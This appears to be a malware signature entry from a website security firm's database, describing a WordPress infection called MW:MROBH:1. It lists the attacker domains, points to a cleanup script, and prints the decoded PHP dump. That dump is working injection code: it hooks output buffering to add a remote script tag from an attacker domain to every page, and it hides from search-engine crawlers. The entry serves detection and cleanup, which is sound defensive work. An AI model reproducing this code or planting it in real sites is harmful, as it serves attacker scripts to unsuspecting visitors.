Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: MW:MROBH:1

Description: Code used to insert a malicious javascript on many wordpress sites. Loading the malware from: http://www.indesignstudioinfo.com/ls.php http://zettapetta.com/js.php http://zettapetta.com/js2.php http://holasionweb.com/oo.php http://www.losotrana.com/js.php Generally infecting the footer.php (or all PHP files in some cases). Clean up:: Run the following script: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html Malware dump (base 64 added to the .php files):
Decoded dump: if(!function_exists('mrobh')) { if(!function_exists('gml')) { function gml() { if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) { return '<script src="http://indesignstudioinfo.com/ls.php"></script>'; } return ""; } } if(!function_exists('gzdecode')) { function gzdecode($var1) { $var3=@ord(@substr($var1,3,1)); $var2=10; if($var3&4) { $var4=@unpack('v',substr($var1,10,2)); $var4=$var4[1]; $var2+=2+$var4; } if($var3&8) { $var2=@strpos($var1,chr(0),$var2)+1; } if($var3&16) { $var2=@strpos($var1,chr(0),$var2)+1; } if($var3&2) { $var2+=2; } $var5=@gzinflate(@substr($var1,$var2)); if($var5===FALSE) { $var5=$var1; } return $var5; } } function mrobh($var6) { Header('Content-Encoding: none'); $var7=gzdecode($var6); if(preg_match('/</body/si',$var7)) { return preg_replace('/(</body[^>]*>)/si', gml()."n".'$1', $var7); } else { return $var7.gml(); } } ob_start('mrobh'); } }

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb